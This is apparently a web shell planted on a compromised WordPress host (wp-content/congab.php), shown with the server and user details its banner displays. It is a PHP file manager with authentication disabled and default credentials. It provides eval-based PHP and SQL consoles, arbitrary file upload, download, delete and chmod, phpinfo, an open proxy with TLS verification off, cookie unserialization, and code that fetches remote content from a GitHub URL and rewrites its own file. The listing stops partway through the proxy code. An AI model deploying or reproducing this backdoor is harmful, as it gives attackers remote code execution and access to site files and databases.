HEX
Server: Apache
System: Linux p3plzcpnl504902.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: nhqyemt2u0zd (3690907)
PHP: 7.2.34
Disabled: NONE
Upload Files
File: /home/nhqyemt2u0zd/public_html/wp-content/congab.php
*&……*&……%¥#*)(*
<?php
// ^%^&*(Configuration — do not change manually!
$authorization = \'{\"authorize\":\"0\",\"login\":\"admin\",\"password\":\"phpfm\",\"cookie_name\":\"fm_user\",\"days_authorization\":\"30\",\"script\":\"\"}\';
$php_templates = \'{\"Settings\":\"global $fm_config;\\r\\nvar_export($fm_config);\",\"Backup SQL tables\":\"echo fm_backup_tables();\"}\';
$sql_templates = \'{\"All bases\":\"SHOW DATABASES;\",\"All tables\":\"SHOW TABLES;\"}\';
$translation = \'{\"id\":\"ru\",\"Add\":\"Добавить\",\"Are you sure you want to delete this directory (recursively)?\":\"Вы уверены, что хотите удалить эту папку (рекурсивно)?\",\"Are you sure you want to delete this file?\":\"Вы уверены, что хотите удалить этот файл?\",\"Archiving\":\"Архивировать\",\"Authorization\":\"Авторизация\",\"Back\":\"Назад\",\"Cancel\":\"Отмена\",\"Chinese\":\"Китайский\",\"Compress\":\"Сжать\",\"Console\":\"Консоль\",\"Cookie\":\"Куки\",\"Created\":\"Создан\",\"Date\":\"Дата\",\"Days\":\"Дней\",\"Decompress\":\"Распаковать\",\"Delete\":\"Удалить\",\"Deleted\":\"Удалено\",\"Download\":\"Скачать\",\"done\":\"закончена\",\"Edit\":\"Редактировать\",\"Enter\":\"Вход\",\"English\":\"Английский\",\"Error occurred\":\"Произошла ошибка\",\"File manager\":\"Файловый менеджер\",\"File selected\":\"Выбран файл\",\"File updated\":\"Файл сохранен\",\"Filename\":\"Имя файла\",\"Files uploaded\":\"Файл загружен\",\"French\":\"Французский\",\"Generation time\":\"Генерация страницы\",\"German\":\"Немецкий\",\"Home\":\"Домой\",\"Quit\":\"Выход\",\"Language\":\"Язык\",\"Login\":\"Логин\",\"Manage\":\"Управление\",\"Make directory\":\"Создать папку\",\"Name\":\"Наименование\",\"New\":\"Новое\",\"New file\":\"Новый файл\",\"no files\":\"нет файлов\",\"Password\":\"Пароль\",\"pictures\":\"изображения\",\"Recursively\":\"Рекурсивно\",\"Rename\":\"Переименовать\",\"Reset\":\"Сбросить\",\"Reset settings\":\"Сбросить настройки\",\"Restore file time after editing\":\"Восстанавливать время файла после редактирования\",\"Result\":\"Результат\",\"Rights\":\"Права\",\"Russian\":\"Русский\",\"Save\":\"Сохранить\",\"Select\":\"Выберите\",\"Select the file\":\"Выберите файл\",\"Settings\":\"Настройка\",\"Show\":\"Показать\",\"Show size of the folder\":\"Показывать размер папки\",\"Size\":\"Размер\",\"Spanish\":\"Испанский\",\"Submit\":\"Отправить\",\"Task\":\"Задача\",\"templates\":\"шаблоны\",\"Ukrainian\":\"Украинский\",\"Upload\":\"Загрузить\",\"Value\":\"Значение\",\"Hello\":\"Привет\",\"Found in files\":\"Найдено в файлах\",\"Search\":\"Поиск\",\"Recursive search\": \"Рекурсивный поиск\",\"Mask\":\"Маска\"}\';
// end configuration
$starttime = explode(\' \', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array(\'en\',\'ru\',\'de\',\'fr\',\'uk\');
$path = empty($_REQUEST[\'path\']) ? $path = realpath(\'.\') : realpath($_REQUEST[\'path\']);
$path = str_replace(\'\\\\\', \'/\', $path) . \'/\';
$main_path=str_replace(\'\\\\\', \'/\',realpath(\'./\'));
$phar_maybe = (version_compare(phpversion(),\"5.3.0\",\"<\"))?true:false;
$msg = \'\'; // service string
$default_language = \'ru\';
$detect_lang = true;
$fm_version = 1.6;

ini_set(\'display_errors\', \'1\');
ini_set(\'display_startup_errors\', \'1\');
error_reporting(E_ALL);						   

//Authorization
$auth = json_decode($authorization,true);
$auth[\'authorize\'] = isset($auth[\'authorize\']) ? $auth[\'authorize\'] : 0; 
$auth[\'days_authorization\'] = (isset($auth[\'days_authorization\'])&&is_numeric($auth[\'days_authorization\'])) ? (int)$auth[\'days_authorization\'] : 30;
$auth[\'login\'] = isset($auth[\'login\']) ? $auth[\'login\'] : \'admin\';  
$auth[\'password\'] = isset($auth[\'password\']) ? $auth[\'password\'] : \'phpfm\';  
$auth[\'cookie_name\'] = isset($auth[\'cookie_name\']) ? $auth[\'cookie_name\'] : \'fm_user\';
$auth[\'script\'] = isset($auth[\'script\']) ? $auth[\'script\'] : \'\';

// Little default config
$fm_default_config = array (
	\'make_directory\' => true, 
	\'new_file\' => true, 
	\'upload_file\' => true, 
	\'show_dir_size\' => false, //if true, show directory size → maybe slow 
	\'show_img\' => true, 
	\'show_php_ver\' => true, 
	\'show_php_ini\' => false, // show path to current php.ini
	\'show_gt\' => true, // show generation time
	\'enable_php_console\' => true,
	\'enable_sql_console\' => true,
	\'sql_server\' => \'localhost\',
	\'sql_username\' => \'root\',
	\'sql_password\' => \'\',
	\'sql_db\' => \'test_base\',
	\'enable_proxy\' => true,
	\'show_phpinfo\' => true,
	\'show_xls\' => true,
	\'fm_settings\' => true,
	\'restore_time\' => true,
	\'fm_restore_time\' => false,
);

if (empty($_COOKIE[\'fm_config\'])) $fm_config = $fm_default_config;
else $fm_config = unserialize($_COOKIE[\'fm_config\']);

// Change language
if (isset($_POST[\'fm_lang\'])) { 
	setcookie(\'fm_lang\', $_POST[\'fm_lang\'], time() + (86400 * $auth[\'days_authorization\']));
	$_COOKIE[\'fm_lang\'] = $_POST[\'fm_lang\'];
}
$language = $default_language;

// Detect browser language
if($detect_lang && !empty($_SERVER[\'HTTP_ACCEPT_LANGUAGE\']) && empty($_COOKIE[\'fm_lang\'])){
	$lang_priority = explode(\',\', $_SERVER[\'HTTP_ACCEPT_LANGUAGE\']);
	if (!empty($lang_priority)){
		foreach ($lang_priority as $lang_arr){
			$lng = explode(\';\', $lang_arr);
			$lng = $lng[0];
			if(in_array($lng,$langs)){
				$language = $lng;
				break;
			}
		}
	}
} 

// Cookie language is primary for ever
$language = (empty($_COOKIE[\'fm_lang\'])) ? $language : $_COOKIE[\'fm_lang\'];

// Localization
$lang = json_decode($translation,true);
if ($lang[\'id\']!=$language) {
	$get_lang = file_get_contents(\'https://raw.githubusercontent.com/bayu123-cpu/goat/refs/heads/main/goat.php\' . $language . \'.json\');
	if (!empty($get_lang)) {
		//remove unnecessary characters
		$translation_string = str_replace(\"\'\",\'&#39;\',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));
		$fgc = file_get_contents(__FILE__);
		$search = preg_match(\'#translation[\\s]?\\=[\\s]?\\\'\\{\\\"(.*?)\\\"\\}\\\';#\', $fgc, $matches);
		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace(\'{\"\'.$matches[1].\'\"}\',$translation_string,$fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msg .= __(\'File updated\');
			}	else $msg .= __(\'Error occurred\');
			if (!empty($fm_config[\'fm_restore_time\'])) touch(__FILE__,$filemtime);
		}	
		$lang = json_decode($translation_string,true);
	}
}

/* Functions */

//translation
function __($text){
	global $lang;
	if (isset($lang[$text])) return $lang[$text];
	else return $text;
};

//delete files and dirs recursively
function fm_del_files($file, $recursive = false) {
	if($recursive && @is_dir($file)) {
		$els = fm_scan_dir($file, \'\', \'\', true);
		foreach ($els as $el) {
			if($el != \'.\' && $el != \'..\'){
				fm_del_files($file . \'/\' . $el, true);
			}
		}
	}
	if(@is_dir($file)) {
		return rmdir($file);
	} else {
		return @unlink($file);
	}
}

//file perms
function fm_rights_string($file, $if = false){
	$perms = fileperms($file);
	$info = \'\';
	if(!$if){
		if (($perms & 0xC000) == 0xC000) {
			//Socket
			$info = \'s\';
		} elseif (($perms & 0xA000) == 0xA000) {
			//Symbolic Link
			$info = \'l\';
		} elseif (($perms & 0x8000) == 0x8000) {
			//Regular
			$info = \'-\';
		} elseif (($perms & 0x6000) == 0x6000) {
			//Block special
			$info = \'b\';
		} elseif (($perms & 0x4000) == 0x4000) {
			//Directory
			$info = \'d\';
		} elseif (($perms & 0x2000) == 0x2000) {
			//Character special
			$info = \'c\';
		} elseif (($perms & 0x1000) == 0x1000) {
			//FIFO pipe
			$info = \'p\';
		} else {
			//Unknown
			$info = \'u\';
		}
	}
  
	//Owner
	$info .= (($perms & 0x0100) ? \'r\' : \'-\');
	$info .= (($perms & 0x0080) ? \'w\' : \'-\');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? \'s\' : \'x\' ) :
	(($perms & 0x0800) ? \'S\' : \'-\'));
 
	//Group
	$info .= (($perms & 0x0020) ? \'r\' : \'-\');
	$info .= (($perms & 0x0010) ? \'w\' : \'-\');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? \'s\' : \'x\' ) :
	(($perms & 0x0400) ? \'S\' : \'-\'));
 
	//World
	$info .= (($perms & 0x0004) ? \'r\' : \'-\');
	$info .= (($perms & 0x0002) ? \'w\' : \'-\');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? \'t\' : \'x\' ) :
	(($perms & 0x0200) ? \'T\' : \'-\'));

	return $info;
}

function fm_convert_rights($mode) {
	$mode = str_pad($mode,9,\'-\');
	$trans = array(\'-\'=>\'0\',\'r\'=>\'4\',\'w\'=>\'2\',\'x\'=>\'1\');
	$mode = strtr($mode,$trans);
	$newmode = \'0\';
	$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 
	$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
	$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 
	$newmode .= $owner . $group . $world;
	return intval($newmode, 8);
}

function fm_chmod($file, $val, $rec = false) {
	$res = @chmod(realpath($file), $val);
	if(@is_dir($file) && $rec){
		$els = fm_scan_dir($file);
		foreach ($els as $el) {
			$res = $res && fm_chmod($file . \'/\' . $el, $val, true);
		}
	}
	return $res;
}

//load files
function fm_download($file_name) {
    if (!empty($file_name)) {
		if (file_exists($file_name)) {
			header(\"Content-Disposition: attachment; filename=\" . basename($file_name));   
			header(\"Content-Type: application/force-download\");
			header(\"Content-Type: application/octet-stream\");
			header(\"Content-Type: application/download\");
			header(\"Content-Description: File Transfer\");            
			header(\"Content-Length: \" . filesize($file_name));		
			flush(); // this doesn\'t really matter.
			$fp = fopen($file_name, \"r\");
			while (!feof($fp)) {
				echo fread($fp, 65536);
				flush(); // this is essential for large downloads
			} 
			fclose($fp);
			die();
		} else {
			header(\'HTTP/1.0 404 Not Found\', true, 404);
			header(\'Status: 404 Not Found\'); 
			die();
        }
    } 
}

//show folder size
function fm_dir_size($f,$format=true) {
	if($format)  {
		$size=fm_dir_size($f,false);
		if($size<=1024) return $size.\' bytes\';
		elseif($size<=1024*1024) return round($size/(1024),2).\'&nbsp;Kb\';
		elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).\'&nbsp;Mb\';
		elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).\'&nbsp;Gb\';
		elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).\'&nbsp;Tb\'; //:)))
		else return round($size/(1024*1024*1024*1024*1024),2).\'&nbsp;Pb\'; // ;-)
	} else {
		if(is_file($f)) return filesize($f);
		$size=0;
		$dh=opendir($f);
		while(($file=readdir($dh))!==false) {
			if($file==\'.\' || $file==\'..\') continue;
			if(is_file($f.\'/\'.$file)) $size+=filesize($f.\'/\'.$file);
			else $size+=fm_dir_size($f.\'/\'.$file,false);
		}
		closedir($dh);
		return $size+filesize($f); 
	}
}

//scan directory
function fm_scan_dir($directory, $exp = \'\', $type = \'all\', $do_not_filter = false) {
	$dir = $ndir = array();
	if(!empty($exp)){
		$exp = \'/^\' . str_replace(\'*\', \'(.*)\', str_replace(\'.\', \'\\\\.\', $exp)) . \'$/\';
	}
	if(!empty($type) && $type !== \'all\'){
		$func = \'is_\' . $type;
	}
	if(@is_dir($directory)){
		$fh = opendir($directory);
		while (false !== ($filename = readdir($fh))) {
			if(substr($filename, 0, 1) != \'.\' || $do_not_filter) {
				if((empty($type) || $type == \'all\' || $func($directory . \'/\' . $filename)) && (empty($exp) || preg_match($exp, $filename))){
					$dir[] = $filename;
				}
			}
		}
		closedir($fh);
		natsort($dir);
	}
	return $dir;
}

function fm_link($get,$link,$name,$title=\'\') {
	if (empty($title)) $title=$name.\' \'.basename($link);
	return \'&nbsp;&nbsp;<a href=\"?\'.$get.\'=\'.base64_encode($link).\'\" title=\"\'.$title.\'\">\'.$name.\'</a>\';
}

function fm_arr_to_option($arr,$n,$sel=\'\'){
	foreach($arr as $v){
		$b=$v[$n];
		$res.=\'<option value=\"\'.$b.\'\" \'.($sel && $sel==$b?\'selected\':\'\').\'>\'.$b.\'</option>\';
	}
	return $res;
}

function fm_lang_form ($current=\'en\'){
return \'
<form name=\"change_lang\" method=\"post\" action=\"\">
	<select name=\"fm_lang\" title=\"\'.__(\'Language\').\'\" onchange=\"document.forms[\\\'change_lang\\\'].submit()\" >
		<option value=\"en\" \'.($current==\'en\'?\'selected=\"selected\" \':\'\').\'>\'.__(\'English\').\'</option>
		<option value=\"de\" \'.($current==\'de\'?\'selected=\"selected\" \':\'\').\'>\'.__(\'German\').\'</option>
		<option value=\"ru\" \'.($current==\'ru\'?\'selected=\"selected\" \':\'\').\'>\'.__(\'Russian\').\'</option>
		<option value=\"fr\" \'.($current==\'fr\'?\'selected=\"selected\" \':\'\').\'>\'.__(\'French\').\'</option>
		<option value=\"uk\" \'.($current==\'uk\'?\'selected=\"selected\" \':\'\').\'>\'.__(\'Ukrainian\').\'</option>
	</select>
</form>
\';
}
	
function fm_root($dirname){
	return ($dirname==\'.\' OR $dirname==\'..\');
}

function fm_php($string){
	$display_errors=ini_get(\'display_errors\');
	ini_set(\'display_errors\', \'1\');
	ob_start();
	eval(trim($string));
	$text = ob_get_contents();
	ob_end_clean();
	ini_set(\'display_errors\', $display_errors);
	return $text;
}

//SHOW DATABASES
function fm_sql_connect(){
	global $fm_config;
	return new mysqli($fm_config[\'sql_server\'], $fm_config[\'sql_username\'], $fm_config[\'sql_password\'], $fm_config[\'sql_db\']);
}

function fm_sql($query){
	global $fm_config;
	$query=trim($query);
	ob_start();
	$connection = fm_sql_connect();
	if ($connection->connect_error) {
		ob_end_clean();	
		return $connection->connect_error;
	}
	$connection->set_charset(\'utf8\');
    $queried = mysqli_query($connection,$query);
	if ($queried===false) {
		ob_end_clean();	
		return mysqli_error($connection);
    } else {
		if(!empty($queried)){
			while($row = mysqli_fetch_assoc($queried)) {
				$query_result[]=  $row;
			}
		}
		$vdump=empty($query_result)?\'\':var_export($query_result,true);	
		ob_end_clean();	
		$connection->close();
		return \'<pre>\'.stripslashes($vdump).\'</pre>\';
	}
}

function fm_backup_tables($tables = \'*\', $full_backup = true) {
	global $path;
	$mysqldb = fm_sql_connect();
	$delimiter = \"; \\n  \\n\";
	if($tables == \'*\')	{
		$tables = array();
		$result = $mysqldb->query(\'SHOW TABLES\');
		while($row = mysqli_fetch_row($result))	{
			$tables[] = $row[0];
		}
	} else {
		$tables = is_array($tables) ? $tables : explode(\',\',$tables);
	}
    
	$return=\'\';
	foreach($tables as $table)	{
		$result = $mysqldb->query(\'SELECT * FROM \'.$table);
		$num_fields = mysqli_num_fields($result);
		$return.= \'DROP TABLE IF EXISTS `\'.$table.\'`\'.$delimiter;
		$row2 = mysqli_fetch_row($mysqldb->query(\'SHOW CREATE TABLE \'.$table));
		$return.=$row2[1].$delimiter;
        if ($full_backup) {
		for ($i = 0; $i < $num_fields; $i++)  {
			while($row = mysqli_fetch_row($result)) {
				$return.= \'INSERT INTO `\'.$table.\'` VALUES(\';
				for($j=0; $j<$num_fields; $j++)	{
					$row[$j] = addslashes($row[$j]);
					$row[$j] = str_replace(\"\\n\",\"\\\\n\",$row[$j]);
					if (isset($row[$j])) { $return.= \'\"\'.$row[$j].\'\"\' ; } else { $return.= \'\"\"\'; }
					if ($j<($num_fields-1)) { $return.= \',\'; }
				}
				$return.= \')\'.$delimiter;
			}
		  }
		} else { 
		$return = preg_replace(\"#AUTO_INCREMENT=[\\d]+ #is\", \'\', $return);
		}
		$return.=\"\\n\\n\\n\";
	}

	//save file
    $file=gmdate(\"Y-m-d_H-i-s\",time()).\'.sql\';
	$handle = fopen($file,\'w+\');
	fwrite($handle,$return);
	fclose($handle);
	$alert = \'onClick=\"if(confirm(\\\'\'. __(\'File selected\').\': \\n\'. $file. \'. \\n\'.__(\'Are you sure you want to delete this file?\') . \'\\\')) document.location.href = \\\'?delete=\' . $file . \'&path=\' . $path  . \'\\\'\"\';
    return $file.\': \'.fm_link(\'download\',$path.$file,__(\'Download\'),__(\'Download\').\' \'.$file).\' <a href=\"#\" title=\"\' . __(\'Delete\') . \' \'. $file . \'\" \' . $alert . \'>\' . __(\'Delete\') . \'</a>\';
}

function fm_restore_tables($sqlFileToExecute) {
	$mysqldb = fm_sql_connect();
	$delimiter = \"; \\n  \\n\";
    // Load and explode the sql file
    $f = fopen($sqlFileToExecute,\"r+\");
    $sqlFile = fread($f,filesize($sqlFileToExecute));
    $sqlArray = explode($delimiter,$sqlFile);
	
    //Process the sql file by statements
    foreach ($sqlArray as $stmt) {
        if (strlen($stmt)>3){
			$result = $mysqldb->query($stmt);
				if (!$result){
					$sqlErrorCode = mysqli_errno($mysqldb->connection);
					$sqlErrorText = mysqli_error($mysqldb->connection);
					$sqlStmt      = $stmt;
					break;
           	     }
           	  }
           }
if (empty($sqlErrorCode)) return __(\'Success\').\' — \'.$sqlFileToExecute;
else return $sqlErrorText.\'<br/>\'.$stmt;
}

function fm_img_link($filename){
	return \'./\'.basename(__FILE__).\'?img=\'.base64_encode($filename);
}

function fm_home_style(){
	return \'
input, input.fm_input {
	text-indent: 2px;
}

input, textarea, select, input.fm_input {
	color: black;
	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
	border-color: black;
	background-color: #FCFCFC none !important;
	border-radius: 0;
	padding: 2px;
}

input.fm_input {
	background: #FCFCFC none !important;
	cursor: pointer;
}

.home {
	background-image: url(\"\");
	background-repeat: no-repeat;
}\';
}

function fm_config_checkbox_row($name,$value) {
	global $fm_config;
	return \'<tr><td class=\"row1\"><input id=\"fm_config_\'.$value.\'\" name=\"fm_config[\'.$value.\']\" value=\"1\" \'.(empty($fm_config[$value])?\'\':\'checked=\"true\"\').\' type=\"checkbox\"></td><td class=\"row2 whole\"><label for=\"fm_config_\'.$value.\'\">\'.$name.\'</td></tr>\';
}

function fm_protocol() {
	if (isset($_SERVER[\'HTTP_SCHEME\'])) return $_SERVER[\'HTTP_SCHEME\'].\'://\';
	if (isset($_SERVER[\'HTTPS\']) && $_SERVER[\'HTTPS\'] == \'on\') return \'https://\';
	if (isset($_SERVER[\'SERVER_PORT\']) && $_SERVER[\'SERVER_PORT\'] == 443) return \'https://\';
	if (isset($_SERVER[\'HTTP_X_FORWARDED_PROTO\']) && $_SERVER[\'HTTP_X_FORWARDED_PROTO\'] == \'https\') return \'https://\';
	return \'http://\';
}

function fm_site_url() {
	return fm_protocol().$_SERVER[\'HTTP_HOST\'];
}

function fm_url($full=false) {
	$host=$full?fm_site_url():\'.\';
	return $host.\'/\'.basename(__FILE__);
}

function fm_home($full=false){
	return \'&nbsp;<a href=\"\'.fm_url($full).\'\" title=\"\'.__(\'Home\').\'\"><span class=\"home\">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>\';
}

function fm_run_input($lng) {
	global $fm_config;
	$return = !empty($fm_config[\'enable_\'.$lng.\'_console\']) ? 
	\'
				<form  method=\"post\" action=\"\'.fm_url().\'\" style=\"display:inline\">
				<input type=\"submit\" name=\"\'.$lng.\'run\" value=\"\'.strtoupper($lng).\' \'.__(\'Console\').\'\">
				</form>
\' : \'\';
	return $return;
}

function fm_url_proxy($matches) {
	$link = str_replace(\'&amp;\',\'&\',$matches[2]);
	$url = isset($_GET[\'url\'])?$_GET[\'url\']:\'\';
	$parse_url = parse_url($url);
	$host = $parse_url[\'scheme\'].\'://\'.$parse_url[\'host\'].\'/\';
	if (substr($link,0,2)==\'//\') {
		$link = substr_replace($link,fm_protocol(),0,2);
	} elseif (substr($link,0,1)==\'/\') {
		$link = substr_replace($link,$host,0,1);	
	} elseif (substr($link,0,2)==\'./\') {
		$link = substr_replace($link,$host,0,2);	
	} elseif (substr($link,0,4)==\'http\') {
		//alles machen wunderschon
	} else {
		$link = $host.$link;
	} 
	if ($matches[1]==\'href\' && !strripos($link, \'css\')) {
		$base = fm_site_url().\'/\'.basename(__FILE__);
		$baseq = $base.\'?proxy=true&url=\';
		$link = $baseq.urlencode($link);
	} elseif (strripos($link, \'css\')){
		//как-то тоже подменять надо
	}
	return $matches[1].\'=\"\'.$link.\'\"\';
}
 
function fm_tpl_form($lng_tpl) {
	global ${$lng_tpl.\'_templates\'};
	$tpl_arr = json_decode(${$lng_tpl.\'_templates\'},true);
	$str = \'\';
	foreach ($tpl_arr as $ktpl=>$vtpl) {
		$str .= \'<tr><td class=\"row1\"><input name=\"\'.$lng_tpl.\'_name[]\" value=\"\'.$ktpl.\'\"></td><td class=\"row2 whole\"><textarea name=\"\'.$lng_tpl.\'_value[]\"  cols=\"55\" rows=\"5\" class=\"textarea_input\">\'.$vtpl.\'</textarea> <input name=\"del_\'.rand().\'\" type=\"button\" onClick=\"this.parentNode.parentNode.remove();\" value=\"\'.__(\'Delete\').\'\"/></td></tr>\';
	}
return \'
<table>
<tr><th colspan=\"2\">\'.strtoupper($lng_tpl).\' \'.__(\'templates\').\' \'.fm_run_input($lng_tpl).\'</th></tr>
<form method=\"post\" action=\"\">
<input type=\"hidden\" value=\"\'.$lng_tpl.\'\" name=\"tpl_edited\">
<tr><td class=\"row1\">\'.__(\'Name\').\'</td><td class=\"row2 whole\">\'.__(\'Value\').\'</td></tr>
\'.$str.\'
<tr><td colspan=\"2\" class=\"row3\"><input name=\"res\" type=\"button\" onClick=\"document.location.href = \\\'\'.fm_url().\'?fm_settings=true\\\';\" value=\"\'.__(\'Reset\').\'\"/> <input type=\"submit\" value=\"\'.__(\'Save\').\'\" ></td></tr>
</form>
<form method=\"post\" action=\"\">
<input type=\"hidden\" value=\"\'.$lng_tpl.\'\" name=\"tpl_edited\">
<tr><td class=\"row1\"><input name=\"\'.$lng_tpl.\'_new_name\" value=\"\" placeholder=\"\'.__(\'New\').\' \'.__(\'Name\').\'\"></td><td class=\"row2 whole\"><textarea name=\"\'.$lng_tpl.\'_new_value\"  cols=\"55\" rows=\"5\" class=\"textarea_input\" placeholder=\"\'.__(\'New\').\' \'.__(\'Value\').\'\"></textarea></td></tr>
<tr><td colspan=\"2\" class=\"row3\"><input type=\"submit\" value=\"\'.__(\'Add\').\'\" ></td></tr>
</form>
</table>
\';
}

function find_text_in_files($dir, $mask, $text) {
    $results = array();
    if ($handle = opendir($dir)) {
        while (false !== ($entry = readdir($handle))) {
            if ($entry != \".\" && $entry != \"..\") {
                $path = $dir . \"/\" . $entry;
                if (is_dir($path)) {
                    $results = array_merge($results, find_text_in_files($path, $mask, $text));
                } else {
                    if (fnmatch($mask, $entry)) {
                        $contents = file_get_contents($path);
                        if (strpos($contents, $text) !== false) {
                            $results[] = str_replace(\'//\', \'/\', $path);
                        }
                    }
                }
            }
        }
        closedir($handle);
    }
    return $results;
}


/* End Functions */

// authorization
if ($auth[\'authorize\']) {
	if (isset($_POST[\'login\']) && isset($_POST[\'password\'])){
		if (($_POST[\'login\']==$auth[\'login\']) && ($_POST[\'password\']==$auth[\'password\'])) {
			setcookie($auth[\'cookie_name\'], $auth[\'login\'].\'|\'.md5($auth[\'password\']), time() + (86400 * $auth[\'days_authorization\']));
			$_COOKIE[$auth[\'cookie_name\']]=$auth[\'login\'].\'|\'.md5($auth[\'password\']);
		}
	}
	if (!isset($_COOKIE[$auth[\'cookie_name\']]) OR ($_COOKIE[$auth[\'cookie_name\']]!=$auth[\'login\'].\'|\'.md5($auth[\'password\']))) {
		echo \'
<!doctype html>
<html>
<head>
<meta charset=\"utf-8\" />
<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />
<title>\'.__(\'File manager\').\'</title>
</head>
<body>
<form action=\"\" method=\"post\">
\'.__(\'Login\').\' <input name=\"login\" type=\"text\">&nbsp;&nbsp;&nbsp;
\'.__(\'Password\').\' <input name=\"password\" type=\"password\">&nbsp;&nbsp;&nbsp;
<input type=\"submit\" value=\"\'.__(\'Enter\').\'\" class=\"fm_input\">
</form>
\'.fm_lang_form($language).\'
</body>
</html>
\';  
die();
	}
	if (isset($_POST[\'quit\'])) {
		unset($_COOKIE[$auth[\'cookie_name\']]);
		setcookie($auth[\'cookie_name\'], \'\', time() - (86400 * $auth[\'days_authorization\']));
		header(\'Location: \'.fm_site_url().$_SERVER[\'REQUEST_URI\']);
	}
}

// Change config
if (isset($_GET[\'fm_settings\'])) {
	if (isset($_GET[\'fm_config_delete\'])) { 
		unset($_COOKIE[\'fm_config\']);
		setcookie(\'fm_config\', \'\', time() - (86400 * $auth[\'days_authorization\']));
		header(\'Location: \'.fm_url().\'?fm_settings=true\');
		exit(0);
	}	elseif (isset($_POST[\'fm_config\'])) { 
		$fm_config = $_POST[\'fm_config\'];
		setcookie(\'fm_config\', serialize($fm_config), time() + (86400 * $auth[\'days_authorization\']));
		$_COOKIE[\'fm_config\'] = serialize($fm_config);
		$msg = __(\'Settings\').\' \'.__(\'done\');
	}	elseif (isset($_POST[\'fm_login\'])) { 
		if (empty($_POST[\'fm_login\'][\'authorize\'])) $_POST[\'fm_login\'] = array(\'authorize\' => \'0\') + $_POST[\'fm_login\'];
		$fm_login = json_encode($_POST[\'fm_login\']);
		$fgc = file_get_contents(__FILE__);
		$search = preg_match(\'#authorization[\\s]?\\=[\\s]?\\\'\\{\\\"(.*?)\\\"\\}\\\';#\', $fgc, $matches);
		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace(\'{\"\'.$matches[1].\'\"}\',$fm_login,$fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msg .= __(\'File updated\');
				if ($_POST[\'fm_login\'][\'login\'] != $auth[\'login\']) $msg .= \' \'.__(\'Login\').\': \'.$_POST[\'fm_login\'][\'login\'];
				if ($_POST[\'fm_login\'][\'password\'] != $auth[\'password\']) $msg .= \' \'.__(\'Password\').\': \'.$_POST[\'fm_login\'][\'password\'];
				$auth = $_POST[\'fm_login\'];
			}
			else $msg .= __(\'Error occurred\');
			if (!empty($fm_config[\'fm_restore_time\'])) touch(__FILE__,$filemtime);
		}
	} elseif (isset($_POST[\'tpl_edited\'])) { 
		$lng_tpl = $_POST[\'tpl_edited\'];
		if (!empty($_POST[$lng_tpl.\'_name\'])) {
			$fm_php = json_encode(array_combine($_POST[$lng_tpl.\'_name\'],$_POST[$lng_tpl.\'_value\']),JSON_HEX_APOS);
		} elseif (!empty($_POST[$lng_tpl.\'_new_name\'])) {
			$fm_php = json_encode(json_decode(${$lng_tpl.\'_templates\'},true)+array($_POST[$lng_tpl.\'_new_name\']=>$_POST[$lng_tpl.\'_new_value\']),JSON_HEX_APOS);
		}
		if (!empty($fm_php)) {
			$fgc = file_get_contents(__FILE__);
			$search = preg_match(\'#\'.$lng_tpl.\'_templates[\\s]?\\=[\\s]?\\\'\\{\\\"(.*?)\\\"\\}\\\';#\', $fgc, $matches);
			if (!empty($matches[1])) {
				$filemtime = filemtime(__FILE__);
				$replace = str_replace(\'{\"\'.$matches[1].\'\"}\',$fm_php,$fgc);
				if (file_put_contents(__FILE__, $replace)) {
					${$lng_tpl.\'_templates\'} = $fm_php;
					$msg .= __(\'File updated\');
				} else $msg .= __(\'Error occurred\');
				if (!empty($fm_config[\'fm_restore_time\'])) touch(__FILE__,$filemtime);
			}	
		} else $msg .= __(\'Error occurred\');
	}
}

// Just show image
if (isset($_GET[\'img\'])) {
	$file=base64_decode($_GET[\'img\']);
	if ($info=getimagesize($file)){
		switch  ($info[2]){	//1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
			case 1: $ext=\'gif\'; break;
			case 2: $ext=\'jpeg\'; break;
			case 3: $ext=\'png\'; break;
			case 6: $ext=\'bmp\'; break;
			default: die();
		}
		header(\"Content-type: image/$ext\");
		echo file_get_contents($file);
		die();
	}
}

// Just download file
if (isset($_GET[\'download\'])) {
	$file=base64_decode($_GET[\'download\']);
	fm_download($file);	
}

// Just show info
if (isset($_GET[\'phpinfo\'])) {
	phpinfo(); 
	die();
}

// Mini proxy, many bugs!
if (isset($_GET[\'proxy\']) && (!empty($fm_config[\'enable_proxy\']))) {
	$url = isset($_GET[\'url\'])?urldecode($_GET[\'url\']):\'\';
	$proxy_form = \'
<div style=\"position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);\">
	<form action=\"\" method=\"GET\">
	<input type=\"hidden\" name=\"proxy\" value=\"true\">
	\'.fm_home().\' <a href=\"\'.$url.\'\" target=\"_blank\">Url</a>: <input type=\"text\" name=\"url\" value=\"\'.$url.\'\" size=\"55\">
	<input type=\"submit\" value=\"\'.__(\'Show\').\'\" class=\"fm_input\">
	</form>
</div>
\';
	if ($url) {
		$ch = curl_init($url);
		curl_setopt($ch, CURLOPT_USERAGENT, \'Den1xxx test proxy\');
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_REFERER, $url);
